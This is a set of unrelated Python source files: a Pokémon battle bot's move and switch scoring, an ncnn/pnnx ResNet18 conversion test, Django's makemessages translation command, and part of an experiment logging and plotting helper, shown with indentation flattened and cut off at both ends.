gmaxPower = 75
else:
gmaxPower = 70
else:
if basePower >= 150:
gmaxPower = 150
elif basePower >= 110:
gmaxPower = 140
elif basePower >= 75:
gmaxPower = 130
elif basePower >= 65:
gmaxPower = 120
elif basePower >= 55:
gmaxPower = 110
elif basePower >= 45:
gmaxPower = 100
else:
gmaxPower = 90
maxmoveCopy['basePower'] = gmaxPower
maxmoves.append(maxmoveCopy)
return maxmoves
def getBaseSpecies(species):
if species in Pokedex: return species
species = species.split('-')[0]
return species
def getAction(battle, playing):
active = battle.me.active
moves = battle.myActiveData[0]['moves']
if playing.endswith('challengecup1v1'):
return getMove(moves, active, battle.other.active, battle), 'move'
else:
act = pickAction(battle, battle.me, battle.other.active)
if act == 'switch':
return getSwitch(battle.me, active.species, battle.other.active), 'switch'
else:
return getMove(moves, active, battle.other.active, battle), 'move'
def calcMatchup(me, other):
score = 0
if me.item.startswith('choice') and me.lastMoveUsed:
score = calcScore(me.lastMoveUsed, me, other.species)
else:
for m in me.moves:
score += calcScore(m, me, other.species)
zmove = getUsableZmove(me)
if zmove:
score += calcScore(zmove, me, other.species)
for m in getDynamaxMoves(me, canDynamax=me.side.canDynamax):
score += calcScore(m, me, other.species)
return score
def pickAction(battle, me, other):
matchups = {}
for mon in me.team:
if not me.team[mon].status == 'fnt':
matchups[mon] = calcMatchup(me.team[mon], other)
if matchups[me.active.species] > 140:
return 'move'
best = [poke for poke,res in matchups.items() if res == max(matchups.values())]
if best[0] == me.active.species:
return 'move'
fainted = 0
for mon in me.team:
if me.team[mon].status == 'fnt':
fainted += 1
if fainted == 5:
return 'move'
if not randint(0,5):
return 'move'
if 'trapped' in battle.myActiveData[0] or me.active.trapped:
return 'move'
return 'switch'
def getMove(moves, active, opponent, battle):
action = ''
move = getCC1v1Move(moves, active, opponent)
if 'isZ' in move and active.side.canZmove:
if battle.hackmons:
# Call this move by its 1-indexed index not name
for i, val in enumerate(moves):
if val['id'] == move['id']:
action += '{}'.format(i + 1)
break
else:
action += '{} zmove'.format(move['baseMove'])
elif 'isMax' in move:
try:
action += move['baseMove']
except KeyError as e:
print(moves)
print(move)
print(e)
if not active.dynamaxed:
action += ' dynamax'
else:
action += move['id']
if active.canMega:
action += ' mega'
if active.canUltraBurst:
action += ' ultra'
return action
def getSwitch(mySide, myActiveSpecies, opponent):
scores = {}
myTeam = mySide.team
for poke in myTeam:
scores[poke] = 0
if myTeam[poke].status == 'fnt':
scores[poke] = -1000
continue
moves = myTeam[poke].moves
for move in moves:
scores[poke] += calcScore(move, myTeam[poke], opponent.species)
zmove = getUsableZmove(myTeam[poke])
if zmove:
scores[poke] += calcScore(zmove, myTeam[poke], opponent.species)
for move in getDynamaxMoves(myTeam[poke], canDynamax=mySide.canDynamax):
scores[poke] += calcScore(move, myTeam[poke], opponent.species)
m = max(scores.values())
picks = [poke for poke,score in scores.items() if score == m]
pick = 0
if len(picks) == 1:
if myActiveSpecies not in picks:
pick = myTeam[picks[0]].teamSlot
else:
if myActiveSpecies in picks:
picks.remove(myActiveSpecies)
pick = myTeam[choice(picks)].teamSlot
if pick <= 1:
notFaintedMons = []
for mon in myTeam:
if not myTeam[mon].status == 'fnt' and not myTeam[mon].teamSlot == 1:
notFaintedMons.append(myTeam[mon].teamSlot)
pick = choice(notFaintedMons)
return pick
def getCC1v1Move(moves, pokemon, opponent):
# Moves is a list of 4 moves, possibly good or bad moves...
# Copy this list so we don't ruin the original one when we append the Z-Move
movescopy = []
if not pokemon.dynamaxed:
for move in moves:
if 'pp' in move and move['pp'] <= 0: continue # Skip 0 pp moves
if 'disabled' in move and move['disabled']: continue
m = move['move'].replace(' ','').lower()
for fault in ['-', "'"]:
m = m.replace(fault,'')
if m == 'recharge': return {'id': m}
for var in ['return', 'frustration']:
if m.startswith(var):
m = var
movescopy.append(Moves[m])
zmove = getUsableZmove(pokemon)
if zmove:
movescopy.append(zmove)
# Dynamaxed Pokemon have different moves they use
# This is also going to decide if we should dynamax
movescopy += getDynamaxMoves(pokemon, pokemon.side.canDynamax)
if pokemon.isChoiceLocked() and not movescopy[0]['id'] == 'struggle':
movescopy = [Moves[pokemon.lastMoveUsed]]
# Early return if there's only one possible option to use
if len(movescopy) == 1:
return movescopy[0]
values = {}
for move in movescopy:
moveid = move['id']
mySpecies = getBaseSpecies(pokemon.species)
oppSpecies = getBaseSpecies(opponent.species)
if 'isZ' in move and not pokemon.side.canZmove:
values[moveid] = 0
continue
# This begins a score system for the moves, naively trying to pick the best moves without calculating damage
# Based on the move's base power
values[moveid] = move['basePower'] if not 'calculateBasePower' in move else move['calculateBasePower'](Pokedex[mySpecies], Pokedex[oppSpecies])
try:
values[moveid] = move['modifyBasePower'](values[moveid], pokemon, opponent)
except KeyError:
pass # expected
chargeMove = 'recharge' in Moves[moveid]['flags'] or 'charge' in Moves[moveid]['flags']
if moveid in blacklist or chargeMove or 'mindBlownRecoil' in Moves[moveid]:
values[moveid] = 0
continue
# STAB-bonus
if move['type'] in Pokedex[mySpecies]['types']:
values[moveid] *= 1.5
# Stat drops and raises
boostTable = [1, 1.5, 2, 2.5, 3, 3.5, 4]
category = 'atk' if move['category'] == 'Physical' else 'spa'
if 'useAlternativeOffensiveStat' in move:
category = move['useAlternativeOffensiveStat']
if pokemon.boosts[category] > 0 or opponent.boosts[category] < 0:
values[moveid] *= boostTable[pokemon.boosts[category]]
if pokemon.boosts[category] < 0 or opponent.boosts[category] > 0:
values[moveid] /= boostTable[-pokemon.boosts[category]]
# Multiply with the effectiveness of the move
eff = 1
if len(Pokedex[oppSpecies]['types']) > 1:
types = Pokedex[oppSpecies]['types']
eff = Types[types[0]][move['type']] * Types[types[1]][move['type']]
else:
eff = Types[ Pokedex[oppSpecies]['types'][0] ][move['type']]
values[moveid] *= eff
# Abilities that give immunities
if move['type'] == 'Water' and Pokedex[oppSpecies]['abilities']['0'] in waterImmune:
values[moveid] = 0
if move['type'] == 'Fire' and Pokedex[oppSpecies]['abilities']['0'] in fireImmune:
values[moveid] = 0
if move['type'] == 'Grass' and Pokedex[oppSpecies]['abilities']['0'] in grassImmune:
values[moveid] = 0
if move['type'] == 'Ground' and Pokedex[oppSpecies]['abilities']['0'] in groundImmune or opponent.item == 'airballon':
values[moveid] = 0
# Ignore most items for now
if pokemon.item == 'choiceband' and move['category'] == 'Physical': values[moveid] *= 1.5
if pokemon.item == 'choicespecs' and move['category'] == 'Special': values[moveid] *= 1.5
if pokemon.item == 'lifeorb': values[moveid] *= 1.3
# Status
if pokemon.status == 'brn' and move['category'] == 'Physical':
if pokemon.ability == 'guts':
values[moveid] *= 1.5
else:
values[moveid] /= 2
options = [m for m,v in values.items() if v == max(values.values())]
picked = choice(options)
return [m for m in movescopy if m['id'] == picked][0]
def getLead(team, opposing):
scores = {}
for mon in team:
scores[mon] = 0
moves = team[mon].moves
for opp in opposing:
for move in moves:
scores[mon] += calcScore(move, team[mon], opp)
zmove = getUsableZmove(team[mon])
if zmove:
scores[mon] += calcScore(zmove, team[mon], opp)
for move in getDynamaxMoves(team[mon], canDynamax=team[mon].side.canDynamax):
scores[mon] += calcScore(move, team[mon], opp)
m = max(scores.values())
options = [poke for poke,score in scores.items() if score == m]
if len(options) > 0:
return team[choice(options)].teamSlot
else:
print('WARNING: Failed to pick proper lead, using random.')
return randint(1, 6)
def calcScore(move, mon, opponents):
''' Calculates an arbitrary score for a move against an opponent to decide how good it is '''
if type(move) is str:
if 'hiddenpower' in move:
move = move[:-2] if not move == 'hiddenpower' else move
for var in ['return', 'frustration']:
if move.startswith(var):
move = var
move = move.replace("'",'')
move = Moves[move]
opp = Pokedex[getBaseSpecies(opponents)]
score = move['basePower'] - (100 - move['accuracy'])
oBias = 'Physical' if mon.stats['atk'] > mon.stats['spa'] else 'Special'
if mon.stats['atk'] == mon.stats['spa']:
oBias = 'No bias'
dBias = 'Physical' if opp['baseStats']['def'] > opp['baseStats']['spd'] else 'Special'
if opp['baseStats']['def'] == opp['baseStats']['spd']:
dBias = 'No bias'
if move['category'] == oBias:
score += 10
if move['category'] == dBias:
score -= 10
# Typing
eff = Types[opp['types'][0]][move['type']]
if len(opp['types']) > 1:
eff *= Types[opp['types'][1]][move['type']]
score *= eff
# Ability
if mon.ability == 'sheerforce' and move['secondary']:
score *= 1.2
if mon.ability == 'strongjaw' and 'bite' in move['flags']:
score *= 1.5
if mon.ability in ['hugepower','purepower', 'adaptability']:
score *= 2
# Ignore most items for now
if mon.item == 'choiceband' and move['category'] == 'Physical': score *= 1.5
if mon.item == 'choicespecs' and move['category'] == 'Special': score *= 1.5
if mon.item == 'lifeorb': score *= 1.3
# Status
if mon.status == 'brn' and move['category'] == 'Physical': score /= 2
return score
|
the-stack_106_13008
|
# Tencent is pleased to support the open source community by making ncnn available.
#
# Copyright (C) 2021 THL A29 Limited, a Tencent company. All rights reserved.
#
# Licensed under the BSD 3-Clause License (the "License"); you may not use this file except
# in compliance with the License. You may obtain a copy of the License at
#
# https://opensource.org/licenses/BSD-3-Clause
#
# Unless required by applicable law or agreed to in writing, software distributed
# under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
# CONDITIONS OF ANY KIND, either express or implied. See the License for the
# specific language governing permissions and limitations under the License.
import torch
import torchvision.models as models
def test():
net = models.resnet18()
net.eval()
torch.manual_seed(0)
x = torch.rand(1, 3, 224, 224)
a = net(x)
# export torchscript
mod = torch.jit.trace(net, x)
mod.save("test_resnet18.pt")
# torchscript to pnnx
import os
os.system("../../src/pnnx test_resnet18.pt inputshape=[1,3,224,224]")
# ncnn inference
import test_resnet18_ncnn
b = test_resnet18_ncnn.test_inference()
return torch.allclose(a, b, 1e-4, 1e-4)
if __name__ == "__main__":
if test():
exit(0)
else:
exit(1)
|
the-stack_106_13011
|
import glob
import os
import re
import sys
from functools import total_ordering
from itertools import dropwhile
import django
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
from django.core.files.temp import NamedTemporaryFile
from django.core.management.base import BaseCommand, CommandError
from django.core.management.utils import (
find_command, handle_extensions, is_ignored_path, popen_wrapper,
)
from django.utils.encoding import DEFAULT_LOCALE_ENCODING
from django.utils.functional import cached_property
from django.utils.jslex import prepare_js_for_gettext
from django.utils.regex_helper import _lazy_re_compile
from django.utils.text import get_text_list
from django.utils.translation import templatize
plural_forms_re = _lazy_re_compile(r'^(?P<value>"Plural-Forms.+?\\n")\s*$', re.MULTILINE | re.DOTALL)
STATUS_OK = 0
NO_LOCALE_DIR = object()
def check_programs(*programs):
for program in programs:
if find_command(program) is None:
raise CommandError(
"Can't find %s. Make sure you have GNU gettext tools 0.15 or "
"newer installed." % program
)
@total_ordering
class TranslatableFile:
def __init__(self, dirpath, file_name, locale_dir):
self.file = file_name
self.dirpath = dirpath
self.locale_dir = locale_dir
def __repr__(self):
return "<%s: %s>" % (
self.__class__.__name__,
os.sep.join([self.dirpath, self.file]),
)
def __eq__(self, other):
return self.path == other.path
def __lt__(self, other):
return self.path < other.path
@property
def path(self):
return os.path.join(self.dirpath, self.file)
class BuildFile:
"""
Represent the state of a translatable file during the build process.
"""
def __init__(self, command, domain, translatable):
self.command = command
self.domain = domain
self.translatable = translatable
@cached_property
def is_templatized(self):
if self.domain == 'djangojs':
return self.command.gettext_version < (0, 18, 3)
elif self.domain == 'django':
file_ext = os.path.splitext(self.translatable.file)[1]
return file_ext != '.py'
return False
@cached_property
def path(self):
return self.translatable.path
@cached_property
def work_path(self):
"""
Path to a file which is being fed into GNU gettext pipeline. This may
be either a translatable or its preprocessed version.
"""
if not self.is_templatized:
return self.path
extension = {
'djangojs': 'c',
'django': 'py',
}.get(self.domain)
filename = '%s.%s' % (self.translatable.file, extension)
return os.path.join(self.translatable.dirpath, filename)
def preprocess(self):
"""
Preprocess (if necessary) a translatable file before passing it to
xgettext GNU gettext utility.
"""
if not self.is_templatized:
return
with open(self.path, encoding='utf-8') as fp:
src_data = fp.read()
if self.domain == 'djangojs':
content = prepare_js_for_gettext(src_data)
elif self.domain == 'django':
content = templatize(src_data, origin=self.path[2:])
with open(self.work_path, 'w', encoding='utf-8') as fp:
fp.write(content)
def postprocess_messages(self, msgs):
"""
Postprocess messages generated by xgettext GNU gettext utility.
Transform paths as if these messages were generated from original
translatable files rather than from preprocessed versions.
"""
if not self.is_templatized:
return msgs
# Remove '.py' suffix
if os.name == 'nt':
# Preserve '.\' prefix on Windows to respect gettext behavior
old_path = self.work_path
new_path = self.path
else:
old_path = self.work_path[2:]
new_path = self.path[2:]
return re.sub(
r'^(#: .*)(' + re.escape(old_path) + r')',
lambda match: match[0].replace(old_path, new_path),
msgs,
flags=re.MULTILINE
)
def cleanup(self):
"""
Remove a preprocessed copy of a translatable file (if any).
"""
if self.is_templatized:
# This check is needed for the case of a symlinked file and its
# source being processed inside a single group (locale dir);
# removing either of those two removes both.
if os.path.exists(self.work_path):
os.unlink(self.work_path)
def normalize_eols(raw_contents):
"""
Take a block of raw text that will be passed through str.splitlines() to
get universal newlines treatment.
Return the resulting block of text with normalized `\n` EOL sequences ready
to be written to disk using current platform's native EOLs.
"""
lines_list = raw_contents.splitlines()
# Ensure last line has its EOL
if lines_list and lines_list[-1]:
lines_list.append('')
return '\n'.join(lines_list)
def write_pot_file(potfile, msgs):
"""
Write the `potfile` with the `msgs` contents, making sure its format is
valid.
"""
pot_lines = msgs.splitlines()
if os.path.exists(potfile):
# Strip the header
lines = dropwhile(len, pot_lines)
else:
lines = []
found, header_read = False, False
for line in pot_lines:
if not found and not header_read:
if 'charset=CHARSET' in line:
found = True
line = line.replace('charset=CHARSET', 'charset=UTF-8')
if not line and not found:
header_read = True
lines.append(line)
msgs = '\n'.join(lines)
# Force newlines of POT files to '\n' to work around
# https://savannah.gnu.org/bugs/index.php?52395
with open(potfile, 'a', encoding='utf-8', newline='\n') as fp:
fp.write(msgs)
class Command(BaseCommand):
help = (
"Runs over the entire source tree of the current directory and "
"pulls out all strings marked for translation. It creates (or updates) a message "
"file in the conf/locale (in the django tree) or locale (for projects and "
"applications) directory.\n\nYou must run this command with one of either the "
"--locale, --exclude, or --all options."
)
translatable_file_class = TranslatableFile
build_file_class = BuildFile
requires_system_checks = []
msgmerge_options = ['-q', '--previous']
msguniq_options = ['--to-code=utf-8']
msgattrib_options = ['--no-obsolete']
xgettext_options = ['--from-code=UTF-8', '--add-comments=Translators']
def add_arguments(self, parser):
parser.add_argument(
'--locale', '-l', default=[], action='append',
help='Creates or updates the message files for the given locale(s) (e.g. pt_BR). '
'Can be used multiple times.',
)
parser.add_argument(
'--exclude', '-x', default=[], action='append',
help='Locales to exclude. Default is none. Can be used multiple times.',
)
parser.add_argument(
'--domain', '-d', default='django',
help='The domain of the message files (default: "django").',
)
parser.add_argument(
'--all', '-a', action='store_true',
help='Updates the message files for all existing locales.',
)
parser.add_argument(
'--extension', '-e', dest='extensions', action='append',
help='The file extension(s) to examine (default: "html,txt,py", or "js" '
'if the domain is "djangojs"). Separate multiple extensions with '
'commas, or use -e multiple times.',
)
parser.add_argument(
'--symlinks', '-s', action='store_true',
help='Follows symlinks to directories when examining source code '
'and templates for translation strings.',
)
parser.add_argument(
'--ignore', '-i', action='append', dest='ignore_patterns',
default=[], metavar='PATTERN',
help='Ignore files or directories matching this glob-style pattern. '
'Use multiple times to ignore more.',
)
parser.add_argument(
'--no-default-ignore', action='store_false', dest='use_default_ignore_patterns',
help="Don't ignore the common glob-style patterns 'CVS', '.*', '*~' and '*.pyc'.",
)
parser.add_argument(
'--no-wrap', action='store_true',
help="Don't break long message lines into several lines.",
)
parser.add_argument(
'--no-location', action='store_true',
help="Don't write '#: filename:line' lines.",
)
parser.add_argument(
'--add-location',
choices=('full', 'file', 'never'), const='full', nargs='?',
help=(
"Controls '#: filename:line' lines. If the option is 'full' "
"(the default if not given), the lines include both file name "
"and line number. If it's 'file', the line number is omitted. If "
"it's 'never', the lines are suppressed (same as --no-location). "
"--add-location requires gettext 0.19 or newer."
),
)
parser.add_argument(
'--no-obsolete', action='store_true',
help="Remove obsolete message strings.",
)
parser.add_argument(
'--keep-pot', action='store_true',
help="Keep .pot file after making messages. Useful when debugging.",
)
def handle(self, *args, **options):
locale = options['locale']
exclude = options['exclude']
self.domain = options['domain']
self.verbosity = options['verbosity']
process_all = options['all']
extensions = options['extensions']
self.symlinks = options['symlinks']
ignore_patterns = options['ignore_patterns']
if options['use_default_ignore_patterns']:
ignore_patterns += ['CVS', '.*', '*~', '*.pyc']
self.ignore_patterns = list(set(ignore_patterns))
# Avoid messing with mutable class variables
if options['no_wrap']:
self.msgmerge_options = self.msgmerge_options[:] + ['--no-wrap']
self.msguniq_options = self.msguniq_options[:] + ['--no-wrap']
self.msgattrib_options = self.msgattrib_options[:] + ['--no-wrap']
self.xgettext_options = self.xgettext_options[:] + ['--no-wrap']
if options['no_location']:
self.msgmerge_options = self.msgmerge_options[:] + ['--no-location']
self.msguniq_options = self.msguniq_options[:] + ['--no-location']
self.msgattrib_options = self.msgattrib_options[:] + ['--no-location']
self.xgettext_options = self.xgettext_options[:] + ['--no-location']
if options['add_location']:
if self.gettext_version < (0, 19):
raise CommandError(
"The --add-location option requires gettext 0.19 or later. "
"You have %s." % '.'.join(str(x) for x in self.gettext_version)
)
arg_add_location = "--add-location=%s" % options['add_location']
self.msgmerge_options = self.msgmerge_options[:] + [arg_add_location]
self.msguniq_options = self.msguniq_options[:] + [arg_add_location]
self.msgattrib_options = self.msgattrib_options[:] + [arg_add_location]
self.xgettext_options = self.xgettext_options[:] + [arg_add_location]
self.no_obsolete = options['no_obsolete']
self.keep_pot = options['keep_pot']
if self.domain not in ('django', 'djangojs'):
raise CommandError("currently makemessages only supports domains "
"'django' and 'djangojs'")
if self.domain == 'djangojs':
exts = extensions or ['js']
else:
exts = extensions or ['html', 'txt', 'py']
self.extensions = handle_extensions(exts)
if (not locale and not exclude and not process_all) or self.domain is None:
raise CommandError(
"Type '%s help %s' for usage information."
% (os.path.basename(sys.argv[0]), sys.argv[1])
)
if self.verbosity > 1:
self.stdout.write(
'examining files with the extensions: %s'
% get_text_list(list(self.extensions), 'and')
)
self.invoked_for_django = False
self.locale_paths = []
self.default_locale_path = None
if os.path.isdir(os.path.join('conf', 'locale')):
self.locale_paths = [os.path.abspath(os.path.join('conf', 'locale'))]
self.default_locale_path = self.locale_paths[0]
self.invoked_for_django = True
else:
if self.settings_available:
self.locale_paths.extend(settings.LOCALE_PATHS)
# Allow to run makemessages inside an app dir
if os.path.isdir('locale'):
self.locale_paths.append(os.path.abspath('locale'))
if self.locale_paths:
self.default_locale_path = self.locale_paths[0]
os.makedirs(self.default_locale_path, exist_ok=True)
# Build locale list
looks_like_locale = re.compile(r'[a-z]{2}')
locale_dirs = filter(os.path.isdir, glob.glob('%s/*' % self.default_locale_path))
all_locales = [
lang_code for lang_code in map(os.path.basename, locale_dirs)
if looks_like_locale.match(lang_code)
]
# Account for excluded locales
if process_all:
locales = all_locales
else:
locales = locale or all_locales
locales = set(locales).difference(exclude)
if locales:
check_programs('msguniq', 'msgmerge', 'msgattrib')
check_programs('xgettext')
try:
potfiles = self.build_potfiles()
# Build po files for each selected locale
for locale in locales:
if '-' in locale:
self.stdout.write(
'invalid locale %s, did you mean %s?' % (
locale,
locale.replace('-', '_'),
),
)
continue
if self.verbosity > 0:
self.stdout.write('processing locale %s' % locale)
for potfile in potfiles:
self.write_po_file(potfile, locale)
finally:
if not self.keep_pot:
self.remove_potfiles()
@cached_property
def gettext_version(self):
# Gettext tools will output system-encoded bytestrings instead of UTF-8,
# when looking up the version. It's especially a problem on Windows.
out, err, status = popen_wrapper(
['xgettext', '--version'],
stdout_encoding=DEFAULT_LOCALE_ENCODING,
)
m = re.search(r'(\d+)\.(\d+)\.?(\d+)?', out)
if m:
return tuple(int(d) for d in m.groups() if d is not None)
else:
raise CommandError("Unable to get gettext version. Is it installed?")
@cached_property
def settings_available(self):
try:
settings.LOCALE_PATHS
except ImproperlyConfigured:
if self.verbosity > 1:
self.stderr.write("Running without configured settings.")
return False
return True
def build_potfiles(self):
"""
Build pot files and apply msguniq to them.
"""
file_list = self.find_files(".")
self.remove_potfiles()
self.process_files(file_list)
potfiles = []
for path in self.locale_paths:
potfile = os.path.join(path, '%s.pot' % self.domain)
if not os.path.exists(potfile):
continue
args = ['msguniq'] + self.msguniq_options + [potfile]
msgs, errors, status = popen_wrapper(args)
if errors:
if status != STATUS_OK:
raise CommandError(
"errors happened while running msguniq\n%s" % errors)
elif self.verbosity > 0:
self.stdout.write(errors)
msgs = normalize_eols(msgs)
with open(potfile, 'w', encoding='utf-8') as fp:
fp.write(msgs)
potfiles.append(potfile)
return potfiles
def remove_potfiles(self):
for path in self.locale_paths:
pot_path = os.path.join(path, '%s.pot' % self.domain)
if os.path.exists(pot_path):
os.unlink(pot_path)
def find_files(self, root):
"""
Get all files in the given root. Also check that there is a matching
locale dir for each file.
"""
all_files = []
ignored_roots = []
if self.settings_available:
ignored_roots = [os.path.normpath(p) for p in (settings.MEDIA_ROOT, settings.STATIC_ROOT) if p]
for dirpath, dirnames, filenames in os.walk(root, topdown=True, followlinks=self.symlinks):
for dirname in dirnames[:]:
if (is_ignored_path(os.path.normpath(os.path.join(dirpath, dirname)), self.ignore_patterns) or
os.path.join(os.path.abspath(dirpath), dirname) in ignored_roots):
dirnames.remove(dirname)
if self.verbosity > 1:
self.stdout.write('ignoring directory %s' % dirname)
elif dirname == 'locale':
dirnames.remove(dirname)
self.locale_paths.insert(0, os.path.join(os.path.abspath(dirpath), dirname))
for filename in filenames:
file_path = os.path.normpath(os.path.join(dirpath, filename))
file_ext = os.path.splitext(filename)[1]
if file_ext not in self.extensions or is_ignored_path(file_path, self.ignore_patterns):
if self.verbosity > 1:
self.stdout.write('ignoring file %s in %s' % (filename, dirpath))
else:
locale_dir = None
for path in self.locale_paths:
if os.path.abspath(dirpath).startswith(os.path.dirname(path)):
locale_dir = path
break
locale_dir = locale_dir or self.default_locale_path or NO_LOCALE_DIR
all_files.append(self.translatable_file_class(dirpath, filename, locale_dir))
return sorted(all_files)
def process_files(self, file_list):
"""
Group translatable files by locale directory and run pot file build
process for each group.
"""
file_groups = {}
for translatable in file_list:
file_group = file_groups.setdefault(translatable.locale_dir, [])
file_group.append(translatable)
for locale_dir, files in file_groups.items():
self.process_locale_dir(locale_dir, files)
def process_locale_dir(self, locale_dir, files):
"""
Extract translatable literals from the specified files, creating or
updating the POT file for a given locale directory.
Use the xgettext GNU gettext utility.
"""
build_files = []
for translatable in files:
if self.verbosity > 1:
self.stdout.write('processing file %s in %s' % (
translatable.file, translatable.dirpath
))
if self.domain not in ('djangojs', 'django'):
continue
build_file = self.build_file_class(self, self.domain, translatable)
try:
build_file.preprocess()
except UnicodeDecodeError as e:
self.stdout.write(
'UnicodeDecodeError: skipped file %s in %s (reason: %s)' % (
translatable.file, translatable.dirpath, e,
)
)
continue
build_files.append(build_file)
if self.domain == 'djangojs':
is_templatized = build_file.is_templatized
args = [
'xgettext',
'-d', self.domain,
'--language=%s' % ('C' if is_templatized else 'JavaScript',),
'--keyword=gettext_noop',
'--keyword=gettext_lazy',
'--keyword=ngettext_lazy:1,2',
'--keyword=pgettext:1c,2',
'--keyword=npgettext:1c,2,3',
'--output=-',
]
elif self.domain == 'django':
args = [
'xgettext',
'-d', self.domain,
'--language=Python',
'--keyword=gettext_noop',
'--keyword=gettext_lazy',
'--keyword=ngettext_lazy:1,2',
'--keyword=pgettext:1c,2',
'--keyword=npgettext:1c,2,3',
'--keyword=pgettext_lazy:1c,2',
'--keyword=npgettext_lazy:1c,2,3',
'--output=-',
]
else:
return
input_files = [bf.work_path for bf in build_files]
with NamedTemporaryFile(mode='w+') as input_files_list:
input_files_list.write('\n'.join(input_files))
input_files_list.flush()
args.extend(['--files-from', input_files_list.name])
args.extend(self.xgettext_options)
msgs, errors, status = popen_wrapper(args)
if errors:
if status != STATUS_OK:
for build_file in build_files:
build_file.cleanup()
raise CommandError(
'errors happened while running xgettext on %s\n%s' %
('\n'.join(input_files), errors)
)
elif self.verbosity > 0:
# Print warnings
self.stdout.write(errors)
if msgs:
if locale_dir is NO_LOCALE_DIR:
file_path = os.path.normpath(build_files[0].path)
raise CommandError(
'Unable to find a locale path to store translations for '
'file %s' % file_path
)
for build_file in build_files:
msgs = build_file.postprocess_messages(msgs)
potfile = os.path.join(locale_dir, '%s.pot' % self.domain)
write_pot_file(potfile, msgs)
for build_file in build_files:
build_file.cleanup()
def write_po_file(self, potfile, locale):
"""
Create or update the PO file for self.domain and `locale`.
Use contents of the existing `potfile`.
Use msgmerge and msgattrib GNU gettext utilities.
"""
basedir = os.path.join(os.path.dirname(potfile), locale, 'LC_MESSAGES')
os.makedirs(basedir, exist_ok=True)
pofile = os.path.join(basedir, '%s.po' % self.domain)
if os.path.exists(pofile):
args = ['msgmerge'] + self.msgmerge_options + [pofile, potfile]
msgs, errors, status = popen_wrapper(args)
if errors:
if status != STATUS_OK:
raise CommandError(
"errors happened while running msgmerge\n%s" % errors)
elif self.verbosity > 0:
self.stdout.write(errors)
else:
with open(potfile, encoding='utf-8') as fp:
msgs = fp.read()
if not self.invoked_for_django:
msgs = self.copy_plural_forms(msgs, locale)
msgs = normalize_eols(msgs)
msgs = msgs.replace(
"#. #-#-#-#-# %s.pot (PACKAGE VERSION) #-#-#-#-#\n" % self.domain, "")
with open(pofile, 'w', encoding='utf-8') as fp:
fp.write(msgs)
if self.no_obsolete:
args = ['msgattrib'] + self.msgattrib_options + ['-o', pofile, pofile]
msgs, errors, status = popen_wrapper(args)
if errors:
if status != STATUS_OK:
raise CommandError(
"errors happened while running msgattrib\n%s" % errors)
elif self.verbosity > 0:
self.stdout.write(errors)
def copy_plural_forms(self, msgs, locale):
"""
Copy plural forms header contents from a Django catalog of locale to
the msgs string, inserting it at the right place. msgs should be the
contents of a newly created .po file.
"""
django_dir = os.path.normpath(os.path.join(os.path.dirname(django.__file__)))
if self.domain == 'djangojs':
domains = ('djangojs', 'django')
else:
domains = ('django',)
for domain in domains:
django_po = os.path.join(django_dir, 'conf', 'locale', locale, 'LC_MESSAGES', '%s.po' % domain)
if os.path.exists(django_po):
with open(django_po, encoding='utf-8') as fp:
m = plural_forms_re.search(fp.read())
if m:
plural_form_line = m['value']
if self.verbosity > 1:
self.stdout.write('copying plural forms: %s' % plural_form_line)
lines = []
found = False
for line in msgs.splitlines():
if not found and (not line or plural_forms_re.search(line)):
line = plural_form_line
found = True
lines.append(line)
msgs = '\n'.join(lines)
break
return msgs
|
the-stack_106_13017
|
import matplotlib.pyplot as plt
import os
import numpy as np
from utils.collect_config import ParameterConfig
import pickle as pkl
def get_color_by_lable(label, index):
new_colors = ['#1f77b4', '#ff7f0e', '#2ca02c', '#d62728',
'#9467bd', '#8c564b', '#e377c2', '#7f7f7f',
'#bcbd22', '#17becf']
color_dict = {
}
if label in color_dict.keys():
return color_dict[label]
else:
return new_colors[index%len(new_colors)]
def write_param_log(agent_params, env_params, env, file_path, exp_params=None, save_pkl=False, print_log=False):
if os.path.isfile(file_path + "/record.pkl"):
print("Log exist")
if save_pkl:
obj = ParameterConfig()
setattr(obj, "agent_params", agent_params)
setattr(obj, "env_params", env_params)
setattr(obj, "environment", env)
with open(file_path+"/record.pkl", "wb") as param_obj:
pkl.dump(obj, param_obj)
print("param saved in", file_path)
with open(file_path + "/param.txt", "w") as param_record:
param_record.write("------ Agent parameters ------\n\n")
est_len = 20
for pair in agent_params.__dict__:
space = " " * (est_len - len(str(pair))) + ": "
if print_log: print(str(pair), space, str(agent_params.__dict__[pair]))
info = str(pair) + space + str(agent_params.__dict__[pair]) + "\n"
param_record.write(info)
param_record.write("\n\n------ Environment parameters ------\n\n")
param_record.write("Env: " + str(env) + "\n\n")
for pair in env_params.__dict__:
space = " " * (est_len - len(str(pair))) + ": "
if print_log: print(str(pair), space, str(env_params.__dict__[pair]))
info = str(pair) + space + str(env_params.__dict__[pair]) + "\n"
param_record.write(info)
if exp_params is not None:
param_record.write("\n\n------ Control exp parameters ------\n\n")
for pair in exp_params.__dict__:
space = " " * (est_len - len(str(pair))) + ": "
if print_log: print(str(pair), space, str(exp_params.__dict__[pair]))
info = str(pair) + space + str(exp_params.__dict__[pair]) + "\n"
param_record.write(info)
print("log saved in", file_path)
def plot_control_exp_curve(all_data, label, lim_x, lim_y, ignore_zero=False, exp_smooth=None, save_path=None, handcode=None, best="largeAUC"):
best_lrs = {}
for k in all_data.keys():
plt.figure()
plt.xlim(lim_x[0], lim_x[1])
plt.ylim(lim_y[0], lim_y[1])
print("\ntitle", k)
mean, upper, lower, lr = plot_control_exp_curve_single_key(plt, all_data[k], label[k], lim_x, lim_y, ignore_zero=ignore_zero, exp_smooth=exp_smooth, best=best)
best_lrs[k] = [mean, upper, lower, lr]
plt.title(k)
plt.legend()
if save_path:
plt.savefig(save_path + k + ".png")
plt.close()
plt.clf()
if not save_path:
plt.show()
plt.figure()
plt.xlim(lim_x[0], lim_x[1])
plt.ylim(lim_y[0], lim_y[1])
for bk in best_lrs.keys():
mean, upper, lower, lr = best_lrs[bk]
lb = str(bk)
x = np.linspace(1, len(mean), len(mean))
plt.plot(x, mean, label=lb)
plt.fill_between(x, upper, lower, alpha=0.3)
plt.xticks(lim_x, lim_x)
curve = np.clip(mean, lim_y[0], lim_y[1])
# auc = np.sum(curve - lim_y[0])
if handcode is not None:
mean, upper, lower = calculate_avg_default(handcode, exp_smooth=exp_smooth)
x = np.linspace(1, len(mean), len(mean))
plt.plot(x, mean, "--", label="hand_code")
plt.title("best settings")
plt.legend()
plt.show()
def plot_control_exp_curve_single_key(canvas, all_data, labels, range_x, range_y, ignore_zero=False, exp_smooth=None, best="largeAUC"):
auc = np.zeros(len(all_data))
